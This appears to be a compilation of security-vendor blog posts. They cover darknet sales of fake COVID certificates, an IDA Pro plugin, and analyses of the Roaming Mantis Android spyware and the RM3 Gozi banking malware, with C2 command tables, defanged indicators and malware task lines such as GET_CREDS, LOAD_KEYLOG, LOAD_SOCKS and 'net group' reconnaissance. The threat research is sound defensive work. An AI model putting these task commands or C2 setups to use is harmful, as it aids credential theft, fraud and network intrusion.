On the darknet marketplaces, the sales of counterfeit COVID-19 test results and vaccination certificates began to outnumber the COVID vaccine offerings in mid-April. This shift is most likely because COVID-19 vaccines are now readily available for those who want them. People can buy and show these certificates without being vaccinated. A growing number of colleges will require students to have received a COVID-19 vaccine before returning to in-person classes by this fall.[2] Soon, COVID-19 vaccination proof is likely to become a requirement of some type of “passport” to board a plane or enter major events and venues.

The growing demand for proof of vaccination is driving an illicit economy for fake vaccination and test certificates. Opportunistic cybercriminals capitalize on public interest in obtaining a COVID-19 immunity passport, particularly for those who oppose COVID-19 vaccines or test positive for COVID-19 but want to return to school or work, resume travel or attend a public event. Counterfeit negative COVID-19 test results and COVID-19 vaccination cards are available for sale at various darknet marketplaces. Fake CDC-issued vaccination cards are available for $50. One vendor offers counterfeit German COVID-19 certificates for $23.35. Vaccination cards with customized information, such as “verified” batch or lot numbers for particular dates and “valid” medical and hospital information, are also available for purchase.

One darknet marketplace vendor offers to sell a digital copy of the COVID-19 vaccination card with detailed printing instructions for $50.

Figure 5: Dark web marketplace offering COVID-19 vaccination cards

One vendor sells CDC vaccination cards for $1,200 and $1,500, as seen in the following screenshot. These cards, according to the advertisement, can be personalized with details such as the prospective buyer’s name and medical information.

Figure 6: Dark web marketplace offering COVID-19 vaccination cards

Other darknet marketplace vendors offer fake CDC-issued COVID-19 vaccination card packages for $1,200 to $2,500. The package contains a PDF file that buyers can type and print, as well as personalized vaccination cards with “real” lot numbers, according to the advertisement. Prospective buyers can pay $1,200 for blank cards or $1,500 for custom-made cards with valid batch numbers, medical and hospital details.

Figure 7: Dark web marketplace offering COVID-19 vaccination cards

One vendor offers counterfeit negative COVID-19 test results and vaccine passports to potential buyers.

Figure 8: Dark web marketplace offering negative COVID-19 test results and vaccination cards

A seller on another dark web market sells five counterfeit German COVID-19 certificates for $23.35. According to the advertisement below, the product is available for shipping to Germany and the rest of the world.

Figure 9: Dark web marketplace offering German COVID-19 vaccination certificates

Conclusion

The proliferation of fraudulent test results and counterfeit COVID-19 vaccine records on darknet marketplaces poses a significant threat to global health while fueling the underground economyWhile an increasing number of countries begin to roll out COVID-19 vaccines and proof of vaccination, questionable COVID vaccines and fake proofs are emerging on the underground market. With the EU and other jurisdictions opening their borders to those who have received vaccinations, individuals will be tempted to obtain false vaccination documents in their drive to a return to pre-pandemic normalcy that includes summer travel and precious time with missed loved ones. Those who buy questionable COVID-19 vaccines or forged vaccination certificaterisk their own lives and the lives of others. Apart from the harm to global health, making payments to darknet marketplaces promotes the growth of illegal products and services. The cycle of the underground economy continues as demand generates inventory, which generates supply. These are the unintended consequences of an effective global COVID vaccine rollout. 

[1] https[:]//www.cnn.com/interactive/2021/health/global-covid-vaccinations/

[2] https[:]//www.npr.org/2021/04/11/984787779/should-colleges-require-covid-19-vaccines-for-fall-more-campuses-are-saying-yes

The post “Fool’s Gold”: Questionable Vaccines, Bogus Results, and Forged Cards appeared first on McAfee Blog.

Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin

25 March 2021 at 11:26

Recent events have highlighted the fact that security researchers are high value targets for threat actors, and given that we deal with malware samples day in and day out, the possibility of either an accidental or intentional compromise is something we all have to take extra precautions to prevent.

Most security researchers will have some kind of AV installed such that downloading a malicious file should trigger a static detection when it is written to disk, but that raises two problems. If the researcher is actively investigating a sample and the AV throws a static detection, this can hamper the very work the researcher is employed to do. Second, it’s good practice not to put known malicious files on your PC: you just might execute them by mistake and/or make your machine “dirty” (in terms of IOCs found on your machine).

One solution to this problem would be to avoid writing samples to disk. As malware reverse engineers, we have to load malware, shellcode and assorted binaries into IDA on a daily basis. After a suggestion from our team member Kasif Dekel, we decided to tackle this problem by creating an IDA plugin that loads a binary into IDA without writing it to disk. We have made this plugin publicly available for other researchers to use. In this post, we’ll describe our Memory Loader plugin’s features, installation and usage.

Memory Loader Plugin

If you have not used IDA Pro plugins before, a plugin basically takes IDA Pro database functionality and extends it. For example, a plugin can take all function entry points and mark them in the graph in red, making it easier to spot them. The plugin feature runs after the IDA database is initialized, meaning there is already a binary loaded into the database. A loader loads a binary into the IDA database.

Our Memory Loader plugin offers several advanced features to the malware analyst. These include loading files from a memory buffer (any source), loading files from zip files (encrypted/unencrypted), and loading files from a URL. Let’s take a look at each in turn.

Loading Files From a Memory Buffer

This plugin offers a library called Memory Loader that anyone can use to extend further the loading capability of IDA Pro to load files from a memory buffer from any source.

MemoryLoader is the base memory loader, a DLL executable, where the memory loading capabilities are stored. Its main functionally is to take a buffer of bytes from a memory buffer and load it into IDA with the appropriate loading scheme.

You will then have an IDA database file and be able to reverse engineer the file just as if it were loaded from the disk but without the attendant risks that come with saving malware to your local drive.

After you’ve analyzed the binary, save your work and close IDA Pro. The temporary IDA db files will be deleted and you will be left with your IDA database file and no binary on the disk.

Loading Files From a Zip/Encrypted Zip

MemZipLoader is able to load both encrypted and plain ZIP files into memory without writing the file to the disk. The loader accepts specific zip format files (.zip). After accepting a zip file, it will display the zip files and allow you to choose the file you want to work with.

MemZipLoader will extract the file from the input ZIP into a memory buffer and load it into IDA without writing it to disk and storing the encrypted zip file on your drive.

Loading Files From a URL

UrlLoader makes loading a file from a URL very easy. The loader is always suggested for any file you open. After you select UrlLoader, you will be asked to enter a URL, and the file downloaded will be stored in a memory buffer.

You will be able to reverse engineer the file and make changes to the IDA database. After you close the IDA window, you will be left with only the database file.

Installation Guide (tested on IDA 7.5+)

  1. Download zip with binaries from here.
  2. Extract the zip files to a folder.
  3. Place the loaders in the loaders directory of IDA.
      1. MemoryLoader.dll -> (C:\Program Files\IDA Pro 7.5)
      2. MemoryLoader64.dll -> (C:\Program Files\IDA Pro 7.5)

  • Place the memory loader DLL in the IDA directory folder.
    1. MemZipLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    2. UrlLoader64.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    3. UrlLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)
    4. MemZipLoader.dll -> (C:\Program Files\IDA Pro 7.5\loaders)

How to Use MemZipLoader & UrlLoader

You can load binaries with MemZipLoader and UrlLoader as follows:

MemZipLoader:

  1. Open IDA and choose zip file.
  2. IDA should automatically suggest the loader:
  3. Once selected, a list of the files from the zip will be displayed:
  4. IDA will then use the loader code and load it as if the binary was a local file on the system.

UrlLoader:

  1. Open any file on your computer in a directory you have write privileges to.
  2. The UrlLoader will suggest a file to open.
  3. After you chose UrlLoader, you will be asked enter a URL:
  4. The loader will browse to the network location you entered. Then IDA Pro will use the loader code and load the binary as if it was a local file.

Setting Up Visual Studio Development

In order to set up the plugin for Visual Studio development, follow these steps.

    1. Open a DLL project in Visual Studio
    2. An IDA loader has three key parts: the accept function, the load function and the loader definition block. Your dllmain file is the file where the loader definition will be.
    3. accept_file – this function returns a boolean if the loader is relevant to the current binary that is being loaded into IDA. For example, if you are loading a PE, the build_loaders_list should return PE.dll as one of the loading options.

load_file – this function is responsible for loading a file into the database. For each loader this function acts differently, so there is not much to say here. Documentation on loaders can be found here.

  1. The project can be compiled into two versions x64 for IDA with x64 addresses, and x64 for IDA x64 with 32 bit addresses. From this point forward we will mark them:
    1. X64 | X64 – 64 bit IDA with 64 BIT addresses
    2. X32 | X64 – 64 bit IDA with 32 BIT addresses

 

  • Target file name (Configuration Properties -> Target Name)
    1. X64 | X64 – $(ProjectName)64
    2. X32 | X64 – $(ProjectName)
  • Include header files: (Similar in: (X64 | x64) and( X64 | X32)
    1. Configuration Properties -> C/C++ -> Additional Include Directories – should point to the location of your IDA PRO SDK.
    2. Set Runtime Library -> Multi-threaded Debug (/MTd)
  • Include lib files:
    1. X64 | X64
      1. idasdk75\lib\x64_win_vc_64
  • X64 | X32
    1. idasdk75\lib\x64_win_vc_32
    2. idasdk75\lib\x64_win_vc_64
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Preprocessor Definitions):
    1. X64 | X64 add: __EA64__
    2. X32 | X64 add: __X64__, __NT__
  • Preprocessor Definitions (Configuration Properties -> C/C++ -> Undefined Preprocessor Definitions):
    1. X32 | X64: __EA64__
  • Conclusion

    When downloading malware to analyze from repositories like VirusTotal, the sample is usually zipped so that the endpoint security doesn’t detect it as malicious. Using our Memory Loader plugin will enable you to reverse engineer malicious binaries without writing them to the disk.

    Using the Memory Loader plugin also saves you time analyzing binaries. When working with malicious content in IDA Pro often a different environment is created for it, usually in a virtual machine. Copying the binary and setting up the machine for research every time you want to open IDA is time-expensive. The Memory Loader plugin will allow you to work from your machine in a safer and more productive way.

    Please note that a IDA professional license is needed to use and develop extensions for IDA Pro.

    The SentinelOne IDA Pro Memory Loader Plugin is available on Github.

 

The post Keep Malware Off Your Disk With SentinelOne’s IDA Pro Memory Loader Plugin appeared first on SentinelLabs.

Roaming Mantis Amplifies Smishing Campaign with OS-Specific Android Malware

5 May 2021 at 18:17
Quel antivirus choisir ?

The Roaming Mantis smishing campaign has been impersonating a logistics company to steal SMS messages and contact lists from Asian Android users since 2018. In the second half of 2020, the campaign improved its effectiveness by adopting dynamic DNS services and spreading messages with phishing URLs that infected victims with the fake Chrome application MoqHao.

Since January 2021, however, the McAfee Mobile Research team has established that Roaming Mantis has been targeting Japanese users with a new malware called SmsSpy. The malicious code infects Android users using one of two variants depending on the version of OS used by the targeted devices. This ability to download malicious payloads based on OS versions enables the attackers to successfully infect a much broader potential landscape of Android devices.

Smishing Technique

The phishing SMS message used is similar to that of recent campaigns, yet the phishing URL contains the term “post” in its composition.

Japanese message: I brought back your luggage because you were absent. please confirm. hxxps://post[.]cioaq[.]com

 

Fig: Smishing message impersonating a notification from a logistics company. (Source: Twitter)

Another smishing message pretends to be a Bitcoin operator and then directs the victim to a phishing site where the user is asked to verify an unauthorized login.

Japanese message: There is a possibility of abnormal login to your [bitFlyer] account. Please verify at the following URL: hxxps://bitfiye[.]com

 

Fig: Smishing message impersonating a notification from a bitcoin operator. (Source: Twitter)

During our investigation, we observed the phishing website hxxps://bitfiye[.]com redirect to hxxps://post.hygvv[.]com. The redirected URL contains the word “post” as well and follows the same format as the first screenshot. In this way, the actors behind the attack attempt to expand the variation of the SMS phishing campaign by redirecting from a domain that resembles a target company and service.

Malware Download

Characteristic of the malware distribution platform, different malware is distributed depending on the Android OS version that accessed the phishing page. On Android OS 10 or later, the fake Google Play app will be downloaded. On Android 9 or earlier devices, the fake Chrome app will be downloaded.

Japanese message in the dialog: “Please update to the latest version of Chrome for better security.”

Fig: Fake Chrome application for download (Android OS 9 or less)

 

Japanese message in the dialog: “[Important] Please update to the latest version of Google Play for better security!”

 

Fig: Fake Google Play app for download (Android OS 10 or above)

Because the malicious program code needs to be changed with each major Android OS upgrade, the malware author appears to cover more devices by distributing malware that detects the OS, rather than attempting to cover a smaller set with just one type of malware

Technical Behaviors

The main purpose of this malware is to steal phone numbers and SMS messages from infected devices. After it runs, the malware pretends to be a Chrome or Google Play app that then requests the default messaging application to read the victim’s contacts and SMS messages. It pretends to be a security service by Google Play on the latest Android device. Additionally, it can also masquerade as a security service on the latest Android devices. Examples of both are seen below.

Japanese message: “At first startup, a dialog requesting permissions is displayed. If you do not accept it, the app may not be able to start, or its functions may be restricted.”

 

Fig: Default messaging app request by fake Chrome app

 

Japanese message: “Secure Internet Security. Your device is protected. Virus and Spyware protection, Anti-phishing protection and Spam mail protection are all checked.”

Fig: Default messaging app request by fake Google Play app

After hiding its icon, the malware establishes a WebSocket connection for communication with the attacker’s command and control (C2) server in the background. The default destination address is embedded in the malware code. It further has link information to update the C2 server location in the event it is needed. Thus, if no default server is detected, or if no response is received from the default server, the C2 server location will be obtained from the update link.

The MoqHao family hides C2 server locations in the user profile page of a blog service, yet some samples of this new family use a Chinese online document service to hide C2 locations. Below is an example of new C2 server locations from an online document:

Fig: C2 server location described in online document

As part of the handshake process, the malware sends the Android OS version, phone number, device model, internet connection type (4G/Wi-Fi), and unique device ID on the infected device to the C2 server.

Then it listens for commands from the C2 server. The sample we analyzed supported the commands below with the intention of stealing phone numbers in Contacts and SMS messages.

Command String Description
通讯录 Send whole contact book to server
收件箱 Send all SMS messages to server
拦截短信&open Start <Delete SMS message>
拦截短信&close Stop <Delete SMS message>
发短信& Command data contains SMS message and destination number, send them via infected device

Table: Remote commands via WebSocket

Conclusion

We believe that the ongoing smishing campaign targeting Asian countries is using different mobile malware such as MoqHao, SpyAgent, and FakeSpy. Based on our research, the new type of malware discovered this time uses a modified infrastructure and payloads. We believe that there could be several groups in the cyber criminals and each group is developing their attack infrastructures and malware separately. Or it could be the work of another group who took advantage of previously successful cyber-attacks.

McAfee Mobile Security detects this threat as Android/SmsSpy and alerts mobile users if it is present and further protects them from any data loss. For more information about McAfee Mobile Security, visit https://www.mcafeemobilesecurity.com.

Appendix – IoC

C2 Servers:

  • 168[.]126[.]149[.]28:7777
  • 165[.]3[.]93[.]6:7777
  • 103[.]85[.]25[.]165:7777

Update Links:

  • r10zhzzfvj[.]feishu.cn/docs/doccnKS75QdvobjDJ3Mh9RlXtMe
  • 0204[.]info
  • 0130one[.]info
  • 210302[.]top
  • 210302bei[.]top

Phishing Domains:

Domain Registration Date
post.jpostp.com 2021-03-15
manag.top 2021-03-11
post.niceng.top 2021-03-08
post.hygvv.com 2021-03-04
post.cepod.xyz 2021-03-04
post.jposc.com 2021-02-08
post.ckerr.site 2021-02-06
post.vioiff.com 2021-02-05
post.cioaq.com 2021-02-04
post.tpliv.com 2021-02-03
posk.vkiiu.com 2021-02-01
sagawae.kijjh.com 2021-02-01
post.viofrr.com 2021-01-31
posk.ficds.com 2021-01-30
sagawae.ceklf.com 2021-01-30
post.giioor.com 2021-01-30
post.rdkke.com 2021-01-29
post.japqn.com 2021-01-29
post.thocv.com 2021-01-28
post.xkdee.com 2021-01-27
post.sagvwa.com 2021-01-25
post.aiuebc.com 2021-01-24
post.postkp.com 2021-01-23
post.solomsn.com 2021-01-22
post.civrr.com 2021-01-21
post.jappnve.com 2021-01-19
sp.vvsscv.com 2021-01-16
ps.vjiir.com 2021-01-15
post.jpaeo.com 2021-01-12
t.aeomt.com 2021-01-2

 

Sample Hash information:

Hash Package name Fake Application
EA30098FF2DD1D097093CE705D1E4324C8DF385E7B227C1A771882CABEE18362 com.gmr.keep Chrome
29FCD54D592A67621C558A115705AD81DAFBD7B022631F25C3BAAE954DB4464B com.gmr.keep Google Play
9BEAD1455BFA9AC0E2F9ECD7EDEBFDC82A4004FCED0D338E38F094C3CE39BCBA com.mr.keep Google Play
D33AB5EC095ED76EE984D065977893FDBCC12E9D9262FA0E5BC868BAD73ED060 com.mrc.keep Chrome
8F8C29CC4AED04CA6AB21C3C44CCA190A6023CE3273EDB566E915FE703F9E18E com.hhz.keeping Chrome
21B958E800DB511D2A0997C4C94E6F0113FC4A8C383C73617ABCF1F76B81E2FD com.hhz.keeping Google Play
7728EF0D45A337427578AAB4C205386CE8EE5A604141669652169BA2FBA23B30 com.hz.keep3 Chrome
056A2341C0051ACBF4315EC5A6EEDD1E4EAB90039A6C336CC7E8646C9873B91A com.hz.keep3 Google Play
054FA5F5AD43B6D6966CDBF4F2547EDC364DDD3D062CD029242554240A139FDB com.hz.keep2 Google Play
DD40BC920484A9AD1EEBE52FB7CD09148AA6C1E7DBC3EB55F278763BAF308B5C com.hz.keep2 Chrome
FC0AAE153726B7E0A401BD07C91B949E8480BAA0E0CD607439ED01ABA1F4EC1A com.hz.keep1 Google Play
711D7FA96DFFBAEECEF12E75CE671C86103B536004997572ECC71C1AEB73DEF6 com.hz.keep1 Chrome
FE916D1B94F89EC308A2D58B50C304F7E242D3A3BCD2D7CCC704F300F218295F com.hz.keep1 Google Play
3AA764651236DFBBADB28516E1DCB5011B1D51992CB248A9BF9487B72B920D4C com.hz.keep1 Chrome
F1456B50A236E8E42CA99A41C1C87C8ED4CC27EB79374FF530BAE91565970995 com.hz.keep Google Play
77390D07D16E6C9D179C806C83D2C196A992A9A619A773C4D49E1F1557824E00 com.hz.keep Chrome
49634208F5FB8BCFC541DA923EBC73D7670C74C525A93B147E28D535F4A07BF8 com.hz.keep Chrome
B5C45054109152F9FE76BEE6CBBF4D8931AE79079E7246AA2141F37A6A81CBA3 com.hz.keep Google Play
85E5DBEA695A28C3BA99DA628116157D53564EF9CE14F57477B5E3095EED5726 com.hz.keep Chrome
53A5DD64A639BF42E174E348FEA4517282C384DD6F840EE7DC8F655B4601D245 com.hz.keep Google Play
80B44D23B70BA3D0333E904B7DDDF7E19007EFEB98E3B158BBC33CDA6E55B7CB com.hz.keep Chrome
797CEDF6E0C5BC1C02B4F03E109449B320830F5ECE0AA6D194AD69E0FE6F3E96 com.hz.keep Chrome
691687CB16A64760227DCF6AECFE0477D5D983B638AFF2718F7E3A927EE2A82C com.hz.keep Google Play
C88C3682337F7380F59DBEE5A0ED3FA7D5779DFEA04903AAB835C959DA3DCD47 com.hz.keep Google Play

 

The post Roaming Mantis Amplifies Smishing Campaign with OS-Specific Android Malware appeared first on McAfee Blog.

CVE‑2021‑1079 – NVIDIA GeForce Experience Command Execution

By: voidsec
5 May 2021 at 07:11

NVIDIA GeForce Experience (GFE) v.<= 3.21 is affected by an Arbitrary File Write vulnerability in the GameStream/ShadowPlay plugins, where log files are created using NT AUTHORITY\SYSTEM level permissions, which lead to Command Execution and Elevation of Privileges (EoP). NVIDIA Security Bulletin – April 2021 NVIDIA Acknowledgements Page This blog post is a re-post of the […]

The post CVE‑2021‑1079 – NVIDIA GeForce Experience Command Execution appeared first on VoidSec.

How to Stop the Popups

5 May 2021 at 18:06

McAfee is tracking an increase in the use of deceptive popups that mislead some users into taking action, while annoying many others.  A significant portion is attributed to browser-based push notifications, and while there are a couple of simple steps users can take to prevent and remediate the situation, there is also some confusion about how these should be handled.

How does this happen?

In many cases scammers use deception to trick users into Allowing push notifications to be delivered to their system.

In other cases, there is no deception involved.  Users willingly opt-in uncoerced.

What happens next?

After Allowing notifications, messages quickly start being received.  Some sites send notifications as often as every minute.

Many messages are deceptive in nature.  Consider this fake alert example.  Clicking the message leads to an imposter Windows Defender alert website, complete with MP3 audio and a phone number to call.

In several other examples, social engineering is crafted around the McAfee name and logo.  Clicking on the messages lead to various websites informing the user their subscription has expired, that McAfee has detected threats on their system, or providing direct links to purchase a McAfee subscription.  Note that “Remove Ads” and similar notification buttons typically lead to the publishers chosen destination rather than anything that would help the user in disabling the popups.  Also note that many of the destination sites themselves prompt the user to Allow more notifications.  This can have a cascading effect where the user is soon flooded with many messages on a regular basis.

 

How can this be remediated?

First, it’s important to understand that the representative images provided here are not indications of a virus infection.  It is not necessary to update or purchase software to resolve the matter.  There is a simple fix:

1. Note the name of the site sending the notification in the popup itself. It’s located next to the browser name, for example:

Example popup with a link to a Popup remover

2. Go to your browser settings’ notification section

3. Search for the site name and click the 3 dotes next to the entry.

Chrome’s notification settings

4. Select Block

Great, but how can this be prevented in the future?

The simplest way is to carefully read such authorization prompts and only click Allow on sites that you trust.  Alternatively, you can disable notification prompts altogether.

As the saying goes, an ounce of prevention is worth a pound of cure.

What other messages should I be on the lookout for?

While there are thousands of various messages and sites sending them, and messages evolve over time, these are the most common seen in April 2021:

  • Activate Protection Now?|Update Available: Antivirus
  • Activate your free security today – Download now|Turn On Windows Protection ✅
  • Activate your McAfee, now! ✅|Click here to review your PC protection
  • Activate your Mcafee, now! ✅|Reminder From McAfee
  • Activate your Norton, now! ✅|Click here to review your PC protection
  • Activate Your PC Security ✅|Download your free Windows protection now.
  • Antivirus Gratis Installieren✅|Bestes Antivirus–Kostenlos herunterladen
  • Antivirus Protection|Download Now To Protect Your Computer From Viruses &amp; Malware Attacks
  • Best Antivirus 2020 – Download Free Now|Install Your Free Antivirus ✅
  • Check here with a Free Virus Scan|Is Windows slow due to virus?
  • Click here to activate McAfee protection|McAfee Safety Alert
  • Click here to activate McAfee protection|Turn on your antivirus
  • Click Here To Activate McAfee Protection|Upgrade Your Antivirus
  • Click here to activate Norton protection|Turn on your antivirus ✅
  • Click here to clean.|System is infected!
  • Click here to fix the error|Protect your PC now !
  • Click here to fix the error|System alert!
  • Click here to protect your data.|Remove useless files advised
  • Click Here To Renew Subscription|Viruses Found (3)
  • Click here to review your PC protection|⚠ Your Mcafee has Expired
  • Click here to Scan and Remove Virus|Potential Virus?
  • Click To Renew Your Subscription|Viruses Found (3)
  • Click to turn on your Norton protection|New (1) Security Notification
  • Critical Virus Alert|Turn on virus protection
  • Free Antivirus Update is|available.Download and protect system?
  • Install Antivirus Now!|Norton – Protect Your PC!
  • Install FREE Antivirus now|Is the system under threat?
  • Install free antivirus|Protect your Windows PC!
  • Jetzt KOSTENLOSES Antivirus installieren|Wird das System bedroht?
  • McAfee Safety Alert|Turn on your antivirus now [Activate]
  • McAfee Total Protection|Trusted Antivirus and Privacy Protection
  • Norton Antivirus|Stay Protected. Activate Now!
  • Norton Expired 3 Days Ago!⚠ |Renew now to stay protected for your PC!
  • PC is under virus threat! |Renew Norton now to say protected ⚠
  • Protect Your Computer From Viruses|⚠ Activate McAfee Antivirus
  • Renew McAfee License Now!|Stay Protected. Renew Now!
  • Renew McAfee License Now!|Your McAfee Has Expired Today
  • Renew Norton License Now!|Your Norton Has Expired Today
  • Renew Now For 2021|Your Norton has Expired Today?
  • Renew now to stay protected!|⚠ Your Mcafee has Expired
  • Scan Report Ready|Tap to reveal
  • Turn on virus protection|Viruses found (3)
  • Your Computer Might be At Risk ☠ |❌ Renew Norton Antivirus!

General safety tips

  • Scams can be quite convincing. It’s better to be quick to block something and slow to allow than the opposite.
  • When in doubt, initiate the communication yourself.
    • Manually enter in a web address rather than clicking a link sent to you.
    • Confirm numbers and addresses before reaching out, such as phone and email.
  • McAfee customers utilizing web protection (including McAfee Web Advisor and McAfee Web Control) are protected from known malicious sites.

The post How to Stop the Popups appeared first on McAfee Blog.

RM3 – Curiosities of the wildest banking malware

By: riftsle
4 May 2021 at 14:47

fumik0_ & the RIFT Team

TL:DR

Our Research and Intelligence Fusion Team have been tracking the Gozi variant RM3 for close to 30 months. In this post we provide some history, analysis and observations on this most pernicious family of banking malware targeting Oceania, the UK, Germany and Italy. 

We’ll start with an overview of its origins and current operations before providing a deep dive technical analysis of the RM3 variant. 

Introduction

Despite its long and rich history in the cyber-criminal underworld, the Gozi malware family is surrounded with mystery and confusion. The leaking of its source code only increased this confusion as it led to an influx of Gozi variants across the threat landscape.  

Although most variants were only short-lived – they either disappeared or were taken down by law enforcement – a few have had greater staying power. 

Since September 2019, Fox-IT/NCC Group has intensified its research into known active Gozi variants. These are operated by a variety of threat actors (TAs) and generally cause financial losses by either direct involvement in transactional fraud, or by facilitating other types of malicious activity, such as targeted ransomware activity. 

Gozi ISFB started targeting financial institutions around 2013-2015 and hasn’t stopped since then. It is one of the few – perhaps the only – main active branches of the notorious 15 year old Gozi / CRM. Its popularity is probably due to the wide range of variants which are available and the way threat actor groups can use these for their own goals. 

In 2017, yet another new version was detected in the wild with a number of major modifications compared to the previous main variant:

  • Rebranded RM loader (called RM3
  • Used exotic PE file format exclusively designed for this banking malware 
  • Modular architecture 
  • Network communication reworked 
  • New modules 

Given the complex development history of the Gozi ISFB forks, it is difficult to say with any certainty which variant was used as the basis for RM3. This is further complicated by the many different names used by the Cyber Threat Intelligence and Anti-Virus industries for this family of malware. But if you would like to understand the rather tortured history of this particular malware a little better, the research and blog posts on the subject by Check Point are a good starting point.

Banking malware targeting mainly Europe & Oceania

With more than four years of activity, RM3 has had a significant impact on the financial fraud landscape by spreading a colossal number of campaigns, principally across two regions:

  • Oceania, to date, Australia and New Zealand are the most impacted countries in this region. Threat actors seemed to have significant experience and used traditional means to conduct fraud and theft, mainly using web injects to push fakes or replacers directly into financial websites. Some of these injectors are more advanced than the usual ones that could be seen in bankers, and suggest the operators behind them were more sophisticated and experienced.
  • Europe, targeting primarily the UK, Germany and Italy. In this region, a manual fraud strategy was generally followed which was drastically different to the approach seen in Oceania.
Two different approaches to fraud used in Europe and Oceania

It’s worth noting that ‘Elite’ in this context means highly skilled operators. The injects provided and the C&C servers are by far the most complicated and restricted ones seen up to this date in the fraud landscape.

Fox-IT/NCC Group has currently counted at least eight* RM3 infrastructures:

  • 4 in Europe
  • 2 in Oceania (that seem to be linked together based on the fact that they share the same inject configurations)
  • 1 worldwide (using AES-encryption)
  • 1 unknown

Looking back, 2019 seems to have been a golden age (at least from the malware operators’ perspective), with five operators active at the same time. This golden age came to a sudden end with a sharp decline in 2020.

RM3 timeline of active campaigns seen in the wild

Even when some RM3 controllers were not delivering any new campaigns, they were still managing their bots by pushing occasional updates and inspecting them carefully. Then, after a number of weeks, they start performing fraud on the most interesting targets. This is an extremely common pattern among bank malware operators in our experience, although the reasons for this pattern remain unclear. It may be a tactic related to maintaining stealth or it may simply be an indication of the operators lagging behind the sheer number of infections.

The global pandemic has had a noticeable impact on many types of RM3 infrastructure, as it has on all malware as a service (MaaS) operations. The widespread lockdowns as a result of the pandemic have resulted in a massive number of bots being shut down as companies closed and users were forced to work from home, in some cases using personal computers. This change in working patterns could be an explanation for what happened between Q1 & Q3 2020, when campaigns were drastically more aggressive than usual and bot infections intensified (and were also of lower quality, as if it was an emergency). The style of this operation differed drastically from the way in which RM3 operated between 2018 and 2019, when there was a partnership with a distributor actor called Sagrid.

Analysis of the separate campaigns reveals that individual campaign infrastructures are independent from each of the others and operate their own strategies:

RM3 InfraTasksInjects
Financial VNC SOCKS
UK 1 No‡ Yes Yes Yes
UK 2 Yes No No No
Italy No‡ Yes Yes Yes
Australia/NZ 1 Yes Yes No‡ No
Australia/NZ 2 Yes Yes No‡ No
RM3 .at ??? ??? ??? ???
Germany ??? ??? ??? ???
Worldwide Yes No No No

Based on the web inject configuration file from config.bin
Based on active campaign monitoring, threat actor team(s) are mainly inspecting bots to manually push extra commands like VNC module for starting fraud activities.

A robust and stable distribution routine

As with many malware processes, renewing bots is not a simple, linear thing and many elements have to be taken into consideration:

  • Malware signatures
  • Packer evading AV/EDR
  • Distribution used (ratio effectiveness)
  • Time of an active campaign before being takedown by abuse

Many channels have been used to spread this malware, with distribution by spam (malspam) the most popular – and also the most effective. Multiple distribution teams are behind these campaigns and it is difficult to identify all of them; particularly so now, given the increased professionalisation of these operations (which now can involve shorter term, contractor like relationships). As a result, while malware campaign infrastructures are separate, there is now more overlap between the various infrastructures. It is certain however that one actor known as Sagrid was definitely the most prolific distributor. Around 2018/2019, Sagrid actively spread malware in Australia and New Zealand, using advanced techniques to deliver it to their victims.

RM3 distribution over the past 4 years

The graphic below shows the distribution method of an individual piece of RM3 malware in more detail.

A simplified path of a payload from its compilation to its delivery

Interestingly, the only exploit kit seen to be involved in the distribution of RM3 has been  Spelevo – at least in our experience. These days, Exploit Kits (EK) are not as active as in their golden era in the 2010s (when Angler EK dominated the market along with Rig and Magnitude). But they are still an interesting and effective technique for gathering bots from corporate networks, where updates are complicated and so can be delayed or just not performed. In other words, if a new bot is deployed using an EK, there is a higher chance that it is part of big network than one distributed by a more ‘classic’ malspam campaign.

Strangely, to this date, RM3 has never been observed targeting financial institutions in North America. Perhaps there are just no malicious actors who want to be part of this particular mule ecosystem in that zone. Or perhaps all the malicious actors in this region are still making enough money from older strains or another banking malware.

Nowadays, there is a steady decline in banking malware in general, with most TAs joining the rising and explosive ransomware trend. It is more lucrative for bank malware gangs to stop their usual business and try to get some exclusive contracts with the ransom teams. The return on investment (ROI) of a ransom paid by a victim is significantly higher than for the whole classic money mule infrastructure. The cost and time required in money mule and inject operations are much more complex than just giving access to an affiliate and awaiting royalties.

Large number of financial institutions targeted

Fox-IT/NCC Group has identified more than 130 financial institution targeted by threat actor groups using this banking malware. As the table below shows, the scope and impact of these attacks is particularly concentrated on Oceania. This is also the only zone where loan and job websites are targeted. Of course, targeting job websites provides them with further opportunities to hire money mules more easily within their existing systems.

CountryBanksWeb ShopsJob OffersLoansCrypto Services
UK281000
IT170000
AU/NZ80~0226

A short timeline of post-pandemic changes

As we’ve already said, the pandemic has had an impact across the entire fraud landscape and forced many TAs (not just those using RM3) to drastically change their working methods. In some cases, they have shut down completely in one field and started doing something else. For RM3 TAs, as for all of us, these are indeed interesting times.

Q3 2019 – Q2 2020, Classic fraud era

Before the pandemic, the tasks pushed by RM3 were pretty standard when a bot was part of the infrastructure. The example below is a basic check for a legitimate corporate bot with an open access point for a threat actor to connect to and start to use for fraud.

GET_CREDS
GET_SYSINFO
LOAD_MODULE=mail.dll,UXA
LOAD_KEYLOG=*
LOAD_SOCKS=XXX.XXX.XXX.XXX:XXXX

Otherwise, the banking malware was configured as an advanced infostealer, designed to steal data and intercept all keyboard interactions.

GET_CREDS
LOAD_MODULE=mail.dll,UXA
LOAD_KEYLOG=*

Q4 2020 – Now, Bot Harvesting Era

Nowadays, bots are basically  removed if they are coming from old infrastructures, if they are not part of an active campaign. It’s an easy way for them for removing researcher bots

DEL_CONFIG

Otherwise, this is a classic information gathering system operation on the host and network. Which indicates TAs are following the ransomware path and declining their fraud legacy step by step.

GET_SYSINFO
RUN_CMD=net group "domain computers" /domain
RUN_CMD=net session

RM3 Configs – Invaluable threat intelligence data

RM3.AT

Around the summer of 2019, when this banking malware was at its height, an infrastructure which was very different from the standard ones first emerged. It mostly used infostealers for distribution and pushed an interesting variant of the RM3 loader.

Based on configs, similarities with the GoziAT TAs were seen. The crossovers were:

  • both infrastructure are using the .at TLD
  • subdomains and domains are using the same naming convention
  • Server ID is also different from the default one (12)
  • Default nameservers config
  • First seen when GoziAT was curiously quiet

An example loader.ini file for RM3.at is shown below:

LOADER.INI - RM3 .AT example
{
    "HOSTS": [
        "api.fiho.at",
        "t2.fiho.at"
    ],
    "NAMESERVERS": [
        "172.104.136.243",
        "8.8.4.4",
        "192.71.245.208",
        "51.15.98.97",
        "193.183.98.66",
        "8.8.8.8"
    ],
